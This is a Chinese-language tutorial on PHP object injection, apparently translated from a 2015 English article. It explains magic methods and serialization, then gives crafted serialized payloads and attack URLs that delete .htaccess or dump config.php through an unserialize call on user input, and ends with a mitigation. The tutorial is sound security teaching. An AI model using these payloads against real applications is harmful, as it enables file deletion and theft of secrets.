理解php物件注入
0x00 背景
原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/
php物件注入是一個非常常見的漏洞,這個型別的漏洞雖然有些難以利用,但仍舊非常危險,為了理解這個漏洞,請讀者具備基礎的php知識。
0x01 漏洞案例
如果你覺得這是個渣渣洞,那麼請看一眼這個列表,一些被審計狗挖到過該漏洞的系統,你可以發現都是一些耳熟能詳的玩意(就國外來說)
除此之外等等一堆系統,八成可能大概在這些還有其他的php程式中還有很多這種型別的漏洞,所以不妨考慮坐下喝杯咖啡並且試著去理解這篇文章。
0x01 PHP類和物件
類和變數是非常容易理解的php概念,打個比方,下面的程式碼在一個類中定義了一個變數和一個方法。
#!php
<?php
class TestClass
{
// 一個變數
public $variable = 'This is a string';
// 一個簡單的方法
public function PrintVariable()
{
echo $this->variable;
}
}
// 建立一個物件
$object = new TestClass();
// 呼叫一個方法
$object->PrintVariable();
?>
它建立了一個物件並且呼叫了 PrintVariable 函式,該函式會輸出變數 variable。
如果想了解更多關於php物件導向程式設計的知識 請點: http://php.net/manual/zh/language.oop5.php
0x02 php magic方法
php類可能會包含一些特殊的函式叫magic函式,magic函式命名是以符號“__”開頭的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。
這些函式在某些情況下會自動呼叫,比如:
__construct 當一個物件建立時呼叫 (constructor) __destruct 當一個物件被銷燬時呼叫 (destructor) __ toString當一個物件被當作一個字串使用
為了更好的理解magic方法是如何工作的,讓我們新增一個magic方法在我們的類中。
#!php
<?php
class TestClass
{
// 一個變數
public $variable = 'This is a string';
// 一個簡單的方法
public function PrintVariable()
{
echo $this->variable . '<br />';
}
// Constructor
public function __construct()
{
echo '__construct <br />';
}
// Destructor
public function __destruct()
{
echo '__destruct <br />';
}
// Call
public function __toString()
{
return '__toString<br />';
}
}
// 建立一個物件
// __construct會被呼叫
$object = new TestClass();
// 建立一個方法
// 'This is a string’ 這玩意會被輸出
$object->PrintVariable();
// 物件被當作一個字串
// __toString 會被呼叫
echo $object;
// End of PHP script
// php指令碼要結束了, __destruct會被呼叫
?>
我們往裡頭放了三個 magic方法,__construct, __destruct和 __toString,你可以看出來,__construct在物件建立時呼叫, __destruct在php指令碼結束時呼叫,__toString在物件被當作一個字串使用時呼叫。
這個指令碼會輸出這狗樣:
__construct
This is a string
__toString
__destruct
這只是一個簡單的例子,如果你想了解更多有關magic函式的例子,請點選下面的連結:
http://php.net/manual/zh/language.oop5.magic.php
0x03 php物件序列化
php允許儲存一個物件方便以後重用,這個過程被稱為序列化,打個比方,你可以儲存一個包含著使用者資訊的物件方便等等重用。
為了序列化一個物件,你需要呼叫 “serialize”函式,函式會返回一個字串,當你需要用到這個物件的時候可以使用“unserialize”去重建物件。
讓我們在序列化丟進那個例子,看看序列化張什麼樣。
#!php
<?php
// 某類
class User
{
// 類資料
public $age = 0;
public $name = '';
// 輸出資料
public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age
. ' years old. <br />';
}
}
// 建立一個物件
$usr = new User();
// 設定資料
$usr->age = 20;
$usr->name = 'John';
// 輸出資料
$usr->PrintData();
// 輸出序列化之後的資料
echo serialize($usr);
?>
它會輸出
User John is 20 years old.
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
你可以看到序列化之後的資料中 有 20和John,其中沒有任何跟類有關的東西,只有其中的資料被資料化。
為了使用這個物件,我們用unserialize重建物件。
#!php
<?php
// 某類
class User
{
// Class data
public $age = 0;
public $name = '';
// Print data
public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
// 重建物件
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');
// 呼叫PrintData 輸出資料
$usr->PrintData();
?>
著會輸出
User John is 20 years old
0x04 序列化magic函式
magic函式constructor (__construct)和 destructor (__destruct) 是會在物件建立或者銷燬時自動呼叫,其他的一些magic函式會在serialize 或者 unserialize的時候被呼叫。
__sleep magic方法在一個物件被序列化的時候呼叫。 __wakeup magic方法在一個物件被反序列化的時候呼叫。
注意 __sleep 必須返回一個陣列與序列化的變數名。
#!php
<?php
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';
public function PrintVariable()
{
echo $this->variable . '<br />';
}
public function __construct()
{
echo '__construct<br />';
}
public function __destruct()
{
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
public function __sleep()
{
echo '__sleep<br />';
return array('variable', 'variable2');
}
}
// 建立一個物件,會呼叫 __construct
$obj = new Test();
// 序列化一個物件,會呼叫 __sleep
$serialized = serialize($obj);
//輸出序列化後的字串
print 'Serialized: ' . $serialized . <br />';
// 重建物件,會呼叫 __wakeup
$obj2 = unserialize($serialized);
//呼叫 PintVariable, 會輸出資料 (BUZZ)
$obj2->PrintVariable();
// php指令碼結束,會呼叫 __destruct
?>
這玩意會輸出:
__construct
__sleep
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}
__wakeup
BUZZ
__destruct
__destruct
你可以看到,我們建立了一個物件,序列化了它(然後__sleep被呼叫),之後用序列化物件重建後的物件建立了另一個物件,接著php指令碼結束的時候兩個物件的__destruct都會被呼叫。
更多相關的內容
http://php.net/manual/zh/language.oop5.serialization.php
0x05 php物件注入
現在我們理解了序列化是如何工作的,我們該如何利用它?事實上,利用這玩意的可能性有很多種,關鍵取決於應用程式的流程與,可用的類,與magic函式。
記住序列化物件的值是可控的。
你可能會找到一套web程式的原始碼,其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函式會影響到web程式。
打個比方,我們可能會找到一個類用於臨時將日誌儲存進某個檔案,當__destruct被呼叫時,日誌檔案會被刪除。然後程式碼張這狗樣。
#!php
<?php
class LogFile
{
// log檔名
public $filename = 'error.log';
// 某程式碼,儲存日誌進檔案
public function LogData($text)
{
echo 'Log some data: ' . $text . '<br />';
file_put_contents($this->filename, $text, FILE_APPEND);
}
// Destructor 刪除日誌檔案
public function __destruct()
{
echo '__destruct deletes "' . $this->filename . '" file. <br />';
unlink(dirname(__FILE__) . '/' . $this->filename);
}
}
?>
某例子關於如何使用這個類
#!php
<?php
include 'logfile.php';
// 建立一個物件
$obj = new LogFile();
// 設定檔名和要儲存的日誌資料
$obj->filename = 'somefile.log';
$obj->LogData('Test');
// php指令碼結束啦,__destruct被呼叫,somefile.log檔案被刪除。
?>
在其他的指令碼,我們可能又恰好找到一個呼叫“unserialize”函式的,並且恰好變數是使用者可控的,又恰好是$_GET之類的什麼玩意的。
#!php
<?php
include 'logfile.php';
// ... 一些狗日的程式碼和 LogFile 類 ...
// 簡單的類定義
class User
{
// 類資料
public $age = 0;
public $name = '';
// 輸出資料
public function PrintData()
{
echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
// 重建 使用者輸入的 資料
$usr = unserialize($_GET['usr_serialized']);
?>
你看,這個程式碼呼叫了 “LogClass” 類,並且有一個 “unserialize” 值是我們可以注入的。
所以構造類似這樣的東西:
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
究竟發生了什麼呢,因為輸入是可控的,所以我們可以構造任意的序列化物件,比如:
#!php
<?php
$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>
這個會輸出
O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}
__destruct deletes ".htaccess" file.
現在我們將構造過後的序列化物件傳送給剛才的指令碼:
script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}
這會輸出
__destruct deletes ".htaccess" file.
現在 .htaccess 已經被幹掉了,因為指令碼結束時 __destruct會被呼叫。不過我們已經可以控制“LogFile”類的變數啦。
這就是漏洞名稱的由來:變數可控並且進行了unserialize操作的地方注入序列化物件,實現程式碼執行或者其他坑爹的行為。
雖然這不是一個很好的例子,不過我相信你可以理解這個概念,unserialize自動呼叫 __wakeup 和 __destruct,接著攻擊者可以控制類變數,並且攻擊web程式。
0x06 常見的注入點
先不談 __wakeup 和 __destruct,還有一些很常見的注入點允許你利用這個型別的漏洞,一切都是取決於程式邏輯。
打個比方,某使用者類定義了一個__toString為了讓應用程式能夠將類作為一個字串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個檔案。
#!php
<?php
// … 一些include ...
class FileClass
{
// 檔名
public $filename = 'error.log';
//當物件被作為一個字串會讀取這個檔案
public function __toString()
{
return file_get_contents($this->filename);
}
}
// Main User class
class User
{
// Class data
public $age = 0;
public $name = '';
// 允許物件作為一個字串輸出上面的data
public function __toString()
{
return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
}
}
// 使用者可控
$obj = unserialize($_GET['usr_serialized']);
// 輸出 __toString
echo $obj;
?>
so,我們構造url
script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}
再想想,如果我們用序列化呼叫 FileClass呢
我們建立利用程式碼
#!php
<?php
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);
?>
接著用生成的exp注入url
script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}
接著網頁會輸出 config.php的原始碼
#!php
<?php
$private_data = 'MAGIC';
?>
ps:我希望這讓你能夠理解。
0x07 其他的利用方法
可能其他的一些magic函式海存在利用點:比如__call 會在物件呼叫不存在的函式時呼叫,__get 和 __set會在物件嘗試訪問一些不存在的類,變數等等時呼叫。
不過需要注意的是,利用場景不限於magic函式,也有一些方式可以在一半的函式中利用這個漏洞,打個比方,一個模組可能定義了一個叫get的函式進行一些敏感的操作,比如訪問資料庫,這就可能造成sql注入,取決於函式本身的操作。
唯一的一個技術難點在於,注入的類必須在注入點所在的地方,不過一些模組或者指令碼會使用“autoload”的功能,具體可以在這裡瞭解
http://php.net/manual/zh/language.oop5.autoload.php
ps:去讀那狗屎的程式碼
0x08 如何利用或者避免這個漏洞
別在任何使用者可控的地方使用“unserialize”,可以考慮“json_decode“
0x09 結論
雖然很難找到而且很難利用,但是這真的真的很嚴重,可以導致各種各樣的漏洞。
相關文章
- WordPress < 3.6.1 PHP 物件注入漏洞2020-08-19PHP物件
- PHP phar:協議物件注入技術介紹2018-08-31PHP協議物件
- PHP 設計模式答疑-物件池與依賴注入的區別2019-11-26PHP設計模式物件依賴注入
- 技術分享 | 一種針對PHP物件注入漏洞的新型利用方法2018-08-31PHP物件
- 理解 Angular 依賴注入2024-02-11Angular依賴注入
- 深入理解PHP物件導向之後期靜態繫結2021-01-17PHP物件
- Joomla 物件注入漏洞分析報告2020-08-19OOM物件
- PHP 依賴注入容器實現2018-09-29PHP依賴注入
- php操作mysql防止sql注入(合集)2018-08-31PHPMySql
- 對於@Bean注入的新理解2024-10-23Bean
- Js物件導向(1): 理解物件2019-02-13JS物件
- PHP物件導向2019-02-16PHP物件
- PHP 建立流式物件2021-11-27PHP物件
- PHP+MySQL 手工注入語句大全2019-03-01PHPMySql
- 前端理解依賴注入(控制反轉)2019-09-08前端依賴注入
- 深入理解springboot的自動注入2022-06-25Spring Boot
- 理解設計模式及依賴注入2020-11-28設計模式依賴注入
- PHP-pfm 理解2019-06-18PHP
- PHP引用的&理解2021-09-09PHP
- php.類與物件2018-11-27PHP物件
- PHP物件導向(三)2018-05-11PHP物件
- php中有沒有物件2020-05-22PHP物件
- PHP 建立鏈式物件2021-11-27PHP物件
- JavaScript物件複製理解2019-01-22JavaScript物件
- 深入理解JVM——物件2020-01-07JVM物件
- 如何理解“物件導向”2019-03-04物件
- 深入理解JavaScript物件2023-02-21JavaScript物件
- 《JavaScript物件導向精要》之三:理解物件2018-12-16JavaScript物件
- Spring關於druid使用注入的深度理解2021-01-01SpringUI
- PHP 單例模式理解2019-04-10PHP單例模式
- PHP單例模式理解2019-02-22PHP單例模式
- PHP 閉包的理解2020-04-12PHP
- Codeigniter 利用加密Key(金鑰)的物件注入漏洞2020-08-19加密物件
- PHP物件基礎知識2018-10-19PHP物件
- PHP 物件導向 (十)Traits2020-01-18PHP物件AI
- PHP物件導向之&引用2021-09-09PHP物件
- 理解 JavaScript 物件的屬性2019-01-20JavaScript物件
- JavaScript 物件導向初步理解2018-05-05JavaScript物件